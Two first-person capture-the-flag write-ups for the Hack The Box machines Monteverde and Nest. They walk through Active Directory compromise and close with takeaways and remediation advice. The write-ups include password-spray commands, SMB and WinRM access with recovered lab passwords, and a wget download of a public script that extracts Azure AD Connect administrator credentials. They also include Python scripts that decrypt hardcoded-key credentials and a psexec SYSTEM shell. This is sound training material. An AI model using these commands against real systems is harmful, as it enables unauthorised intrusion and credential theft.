Monteverde writeup

Box name: Monteverde

Difficulty: Medium

OS: Windows

Overview: Monteverde is a Medium Windows machine that features Azure AD Connect. The domain is enumerated and a user list is created. Through password spraying, the SABatchJobs service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the $users share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as mhope using WinRM. Enumeration shows that Azure AD Connect is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator).

Link: https://app.hackthebox.com/machines/Monteverde?tab=machine_info&sort_by=created_at&sort_type=desc

Machine IP: 10.129.228.111

Ran rustscan against the machine.

rustscan -a 10.129.228.111 –ulimit 5000 -b 2000 — -A -Pn

I knew it’d be an AD machine considering I’m doing this as practice for PNPT. Domain is MEGABANK.LOCAL according to the scan. Lldap usually does my wonders so I tried that first.

ldapsearch -x -H ldap://10.129.228.111:389 -b “dc=MEGABANK,dc=local”

And it did give me a bunch of information. One thing that is interesting is Azure Admins.

Other groups show potentially that this is using ADSync such as ADSyncPasswordSet, ADSyncBrowse, etc. I have some familiarity as some of my clients use this. There is also a ADsync service account and a SQL database is appears.

Created a list of all the users in users.txt. I tried a bunch of different enumeration, password bruteforcing, etc and what worked was attempting to use the username as the password in a spray.

crackmapexec smb 10.129.228.111 -u users.txt -p users.txt –no-bruteforce –continue-on-success

SABatchJobs:SABatchJobs

Did more enumeration with these credentials. What is most interesting is a file share I found called azure_uploads.

crackmapexec smb 10.129.228.111 -u ‘SABatchJobs’ -p ‘SABatchJobs’ –shares

smbclient //10.129.228.111/azure_uploads -U SABatchJobs

Unfortunately that had nothing. Checked out the users directory next.

smbclient //10.129.228.111/users$ -U SABatchJobs

Checked all the directories out. Only mhope had a file azure.xml. Grabbed that.

Read that and we got some credentials.

mhope:4n0therD4y@n0th3r$

Checked out shares again.

crackmapexec smb 10.129.228.111 -u ‘mhope’ -p ‘4n0therD4y@n0th3r$’ –shares

Nothing new from what I could see. Evil-winrmed into the device and got user.txt.

Started bloodhound and ran bloodhound python to get information so we can find an avenue of attack.

bloodhound-python -u ‘mhope’ -p ‘4n0therD4y@n0th3r$’ -d MEGABANK.local -ns 10.129.228.111 -c All –zip

Uploaded the output. Ran some queries for a while but I could not find any path suitable for us. Got a shell again with Evil-winrm and uploaded winPEAS. Ran that. Everything is just pointing to Azure AD Connect.

After having some issues with finding how to extract it I asked Claude and it told me about a XPN’s script.

wget https://gist.githubusercontent.com/xpn/0dc393e944d8733e3c63023968583545/raw -O azuread_decrypt_msol.ps1

Had to edit the script so it points to the proper database as the original script points to a local db.

powershell -ep bypass -c “. .\azuread_decrypt_msol.ps1”

And we get the token.

administrator:d0m@in4dminyeah!

I was then able to evil-winrm in with these credentials successfully and got root.txt.

evil-winrm -i 10.129.228.111 -u ‘administrator’ -p ‘d0m@in4dminyeah!’

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified a domain-joined Windows machine with the domain MEGABANK.LOCAL. Ran an anonymous LDAP search and retrieved a large amount of domain information including user accounts, groups, and indications of Azure AD Connect through group names such as ADSyncPasswordSet and ADSyncBrowse. Built a full user list from the LDAP output.

rustscan -a 10.129.228.111 –ulimit 5000 -b 2000 — -A -Pn ldapsearch -x -H ldap://10.129.228.111:389 -b “dc=MEGABANK,dc=local”

2 – Password spray with username as password Tried various enumeration and brute force approaches with no success. Sprayed the user list against itself using CrackMapExec with the username as the password for each account. SABatchJobs authenticated successfully.

crackmapexec smb 10.129.228.111 -u users.txt -p users.txt –no-bruteforce –continue-on-success

Credentials recovered: SABatchJobs:SABatchJobs

3 – SMB enumeration and credential discovery Enumerated SMB shares with the SABatchJobs credentials and found azure_uploads and users$ shares. The azure_uploads share was empty. The users$ share was world-readable and contained a directory for mhope with an azure.xml file. Read the file and recovered plaintext credentials.

smbclient //10.129.228.111/users$ -U SABatchJobs

Credentials recovered: mhope:4n0therD4y@n0th3r$

4 – WinRM access and user flag Authenticated via evil-winrm as mhope and retrieved user.txt.

evil-winrm -i 10.129.228.111 -u mhope -p ‘4n0therD4y@n0th3r$’

5 – Privilege Escalation – Azure AD Connect credential extraction Ran BloodHound and WinPEAS both pointing to Azure AD Connect as the escalation path. Used XPN’s public PowerShell script to extract the MSOL service account credentials from the Azure AD Connect database, modifying the script to point to the correct local database path. Recovered the domain administrator password used by the ADSync service account for directory replication.

powershell -ep bypass -c “. .\azuread_decrypt_msol.ps1”

Credentials recovered: administrator:d0m@in4dminyeah!

6 – Domain Administrator access Authenticated via evil-winrm as Administrator and retrieved root.txt.

evil-winrm -i 10.129.228.111 -u ‘administrator’ -p ‘d0m@in4dminyeah!’

Key Takeaways

1. Anonymous LDAP bind exposing full domain enumeration – The domain controller allowed unauthenticated LDAP queries returning all domain users, groups, and service account information including Azure AD Connect group membership. Anonymous LDAP bind must be disabled and LDAP signing and channel binding must be enforced on all domain controllers.
   
2. Service account using username as password – SABatchJobs was configured with its own username as its password, which is trivially discovered through a username-as-password spray. Service accounts must use long randomly generated passwords managed through a PAM solution and must never use predictable values derived from the account name.
   
3. Plaintext credentials stored in an SMB-accessible XML file – The azure.xml file in mhope’s user directory on the users$ share contained plaintext credentials. Sensitive configuration files containing credentials must never be stored on SMB shares and must be access-controlled to only the owning user or service.
   
4. World-readable users$ share – The users$ share was readable by the SABatchJobs service account, exposing all user home directories and their contents. SMB shares must be restricted to only the users who have an operational requirement to access them and must never be world-readable.
   
5. Azure AD Connect storing recoverable administrator credentials – The Azure AD Connect MSOL service account credentials were stored in a local database in a recoverable form, and the script to decrypt them is publicly available. Any account with local access to the Azure AD Connect server can extract domain administrator credentials. Azure AD Connect servers must be treated as tier-0 assets with the same controls as domain controllers.
   

Remediation

[Immediate] Disable anonymous LDAP bind Configure all domain controllers to require authentication for LDAP queries. Enforce LDAP signing and channel binding via Group Policy and set dsHeuristics to disable anonymous access. This prevents unauthenticated enumeration of users, groups, and service account details.

[Immediate] Rotate SABatchJobs and all other service account passwords Rotate the SABatchJobs password immediately to a randomly generated string of at least 25 characters. Audit all service accounts for username-as-password or other predictable credential patterns and force resets. Deploy Group Managed Service Accounts for all service accounts to automate password management.

[Immediate] Remove the azure.xml file and rotate mhope’s credentials Delete the azure.xml file from the SMB share immediately and rotate the mhope account password. Audit all user directories on all SMB shares for files containing credential material and remove any findings. Implement a DLP control to detect credential patterns in files written to shared locations.

[Immediate] Restrict the users$ share permissions Remove world-readable access from the users$ share. Each user directory must be accessible only to the owning user and domain administrators. Audit all SMB share permissions across the environment and apply the principle of least privilege to all share ACLs.

[Immediate] Treat the Azure AD Connect server as a tier-0 asset Apply domain controller level access controls to the Azure AD Connect server. Restrict local logon and remote management to dedicated tier-0 administrator accounts only. Monitor all access to the Azure AD Connect database and alert on any script or process attempting to read MSOL credentials. Rotate the MSOL service account password immediately using the documented Microsoft procedure.

[Long-term] Implement tiered Active Directory administration and Azure AD Connect hardening Adopt a tiered AD model ensuring Azure AD Connect servers are in tier-0 alongside domain controllers. Define a hardening standard covering LDAP security, share permissions, service account credential management, and Azure AD Connect access controls. Include Azure AD Connect infrastructure in the regular penetration testing scope and deploy BloodHound continuously to monitor for new privilege escalation paths.

Nest writeup

Box name: Nest

Difficulty: Easy

OS: Windows

Overview: Nest is an easy difficulty Windows machine featuring an SMB server that permits guest access. The shares can be enumerated to gain credentials for a low privileged user. This user is found to have access to configuration files containing sensitive information. Another user's password is found through source code analysis, which is used to gain a foothold on the box. A custom service is found to be running, which is enumerated to find and decrypt Administrator credentials.

Link: https://app.hackthebox.com/machines/Nest?tab=machine_info&sort_by=created_at&sort_type=desc

Machine IP: 10.129.6.95

Ran rustscan against the machine.

rustscan -a 10.129.6.95 –ulimit 5000 -b 2000 — -A -Pn

SMB is open but I’m unsure what port 4386 is. I’ll check out SMB first anyways.

smbclient -N -L //10.129.6.95/ 

Connected to the Users share. Can’t actually get the directories and nothing in them but we atleast have potential users.

smbclient //10.129.6.95/Data -U anonymous

Put the user names in users.txt. Read Data and we do get a Welcome Email which definitely looks interesting.

We get TempUser’s password. Sprayed that password and there’s a few users that have that password still. TempUser:welcome2019

netexec smb 10.129.6.95 -u users.txt -p welcome2019 –continue-on-success

Regardless let’s see what privileges we have now. Connected back to Data share and we have access to the IT share.

Nothing much in other directories besides \IT\Configs\.

In \IT\Configs\NotepadPlusPlus\config.xml we get mention of interesting files paths.

It’s not visible but it still let’s us navigate there.

I don’t see a Temp.txt but I poked around in here further. I found more mention of a RUScanner. In Utils.vb I can see encryption functions. Went back to the data share and a username and encrypted password is there.

c.smith:fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=

With the found information I couldn’t find any existing decryptor tools or able to get Cyberchef to work. I eventually need to get better at coding and scripting myself but I have AI create me a decryption script with our existing knowledge.

pip install pycryptodome --break-system-packages
python3 -c "
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import HMAC, SHA1
import base64
key = PBKDF2(b'N3st22', b'88552299', dkLen=32, count=2,
             prf=lambda p, s: HMAC.new(p, s, SHA1).digest())
ct = base64.b64decode('fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=')
cipher = AES.new(key, AES.MODE_CBC, b'464R5DFA5DL6LE28')
print(cipher.decrypt(ct))
"

C.Smith:xRxRxPANCAK3SxRxRx

I was able to authenticate to the Users share and get user.txt.

smbclient //10.129.6.95/Users -U C.Smith%xRxRxPANCAK3SxRxRx

Also poked at the HQK Reporting directory. This is what is running on port 4386. I tried connecting to the port with telnet but nothing is of important besides DEBUG it seems but we don’t have a password.

I got stuck here so I peeked at the write up as the Debug Mode Password file was empty. There is ADS associated and we can actually use allinfo on it from SMB which I didn’t know.

WBQ201953D8w

That worked for DEBUG mode with more options.

Unfortunately with LIST and SETDIR we can’t get into Administrator. Poking around further there is a Ldap.conf file in C:\Program Files\HQK.

If we SHOWQUERY on that file it gives us a password but it’s encrypted.

I got stuck again and peeked at the write. We have to decompile the .exe. I don’t have much practice doing this. The tool used looks like it Windows only. It uses the same encrypt code as it did earlier but we need the new parameter. We can get that with strings.

strings -e l HqkLdap.exe

python3 -c "
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import HMAC, SHA1
import base64
key = PBKDF2(b'667912', b'1313Rf99', dkLen=32, count=3,
             prf=lambda p, s: HMAC.new(p, s, SHA1).digest())
ct = base64.b64decode('yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=')
cipher = AES.new(key, AES.MODE_CBC, b'1L1SA61493DRV53Z')
print(cipher.decrypt(ct))
"

Administrator:XtH4nkS4Pl4y1nGX

Couldn’t grab the flag from the SMB share so I got a shell and grabbed the flag.

psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.129.6.95

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified ports 445 (SMB) and 4386 (unknown custom service). Checked SMB with anonymous access and found a Data share and a Users share. Connected to the Data share and found a Welcome Email containing a temporary password.

rustscan -a 10.129.6.95 –ulimit 5000 -b 2000 — -A -Pn smbclient -N -L //10.129.6.95/

Credentials recovered: TempUser:welcome2019

2 – SMB enumeration and encrypted credential discovery Sprayed the temporary password across all enumerated users and confirmed TempUser authenticated. Connected to the Data share with TempUser credentials and found access to IT configuration directories. In the NotepadPlusPlus config.xml found references to interesting file paths. Navigated those paths and found source code in Utils.vb revealing AES encryption functions. Found an encrypted password for C.Smith in the Data share.

Encrypted credential found: c.smith:fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=

3 – Credential decryption and lateral movement Used the encryption parameters extracted from Utils.vb including the passphrase, salt, IV, and PBKDF2 key derivation settings to write a Python decryption script. Decrypted C.Smith’s password and authenticated to the Users SMB share. Retrieved user.txt.

Credentials recovered: C.Smith:xRxRxPANCAK3SxRxRx

4 – HQK Reporting service debug mode access Investigated port 4386 and identified it as the HQK Reporting service. Connected via Telnet and found a DEBUG command requiring a password. The Debug Mode Password file appeared empty but used allinfo in SMB to reveal an Alternate Data Stream attached to the file containing the debug password. Authenticated to debug mode which exposed additional commands and directory navigation.

Debug password recovered: WBQ201953D8w

5 – Administrator credential decryption via binary analysis Navigated the HQK service directories and found an LDAP configuration file containing another encrypted password. Downloaded HqkLdap.exe and used strings to extract the encryption parameters including passphrase, salt, and IV for this second encryption context. Wrote a second Python decryption script using the new parameters and decrypted the Administrator password.

strings -e l HqkLdap.exe

Credentials recovered: Administrator:XtH4nkS4Pl4y1nGX

6 – Root Used impacket-psexec with the Administrator credentials to get a SYSTEM shell and retrieved root.txt.

psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.129.6.95

Key Takeaways

1. SMB guest access exposing sensitive files and credentials – Anonymous and guest SMB access exposed the Data share containing a welcome email with a temporary password and configuration files referencing encrypted credentials. SMB shares must require authenticated access and must be audited regularly for sensitive content.
   
2. Temporary password not rotated across multiple accounts – The welcome2019 temporary password was still active on TempUser and potentially other accounts, indicating a lack of enforced password change policy. Temporary passwords must be single-use, time-limited, and technically forced to change on first login.
   
3. Encryption key material hardcoded in application source code – The AES passphrase, salt, and IV used to encrypt credentials were embedded in Utils.vb and recoverable from source files accessible via SMB. Encryption key material must never be hardcoded in source code or configuration files. Use a hardware security module or secrets management solution for key storage.
   
4. Credentials stored in encrypted form recoverable via binary analysis – Both C.Smith and Administrator passwords were encrypted using parameters extractable from source code and binary strings, providing no meaningful protection once the encryption implementation was known. Credentials should be stored using one-way adaptive hashing rather than reversible encryption whenever possible.
   
5. Sensitive data hidden in NTFS Alternate Data Streams – The debug password was stored in an ADS attached to what appeared to be an empty file. ADS can be used to conceal data from standard directory listings and must be included in file auditing and integrity monitoring. Security tools must be configured to scan for and alert on unexpected ADS across sensitive directories.
   

Remediation

[Immediate] Disable SMB guest and anonymous access Disable guest and anonymous SMB access across all shares immediately. Require authenticated access for every share and restrict permissions to only the users and groups with an operational requirement. Audit all share contents for sensitive files, configuration data, and credential material and remove any findings.

[Immediate] Enforce password change on first login and eliminate temporary password reuse Implement a technical control requiring all accounts provisioned with a temporary password to change it before any access is granted. Temporary passwords must be unique per account, randomly generated, and expire after 24 hours if unused. Audit all accounts for unchanged temporary or default passwords and force immediate resets.

[Immediate] Rotate all recovered credentials The TempUser, C.Smith, and Administrator credentials must all be considered fully compromised. Rotate all affected passwords immediately and audit all other accounts for reuse of any recovered credential.

[Immediate] Remove encryption key material from source code and binaries Remove all hardcoded passphrases, salts, and IVs from Utils.vb, HqkLdap.exe, and any other application file. Migrate key material to a dedicated secrets management solution or HSM. Conduct a full audit of all source files and binaries for embedded cryptographic parameters.

[Short-term] Audit NTFS Alternate Data Streams across sensitive directories Run a full ADS scan across all sensitive directories using Sysinternals Streams or equivalent. Implement file integrity monitoring configured to detect ADS creation and alert on unexpected streams attached to files in sensitive locations. Include ADS scanning in the regular security audit program.

[Long-term] Implement a secrets management and application hardening baseline for custom services Define a hardening standard for all custom Windows services covering credential storage mechanisms, network exposure, authentication requirements, and encryption key management. Custom services handling credentials must store them using a secure secrets management solution rather than reversible encryption with embedded keys. Include all custom services in the scope of regular penetration tests.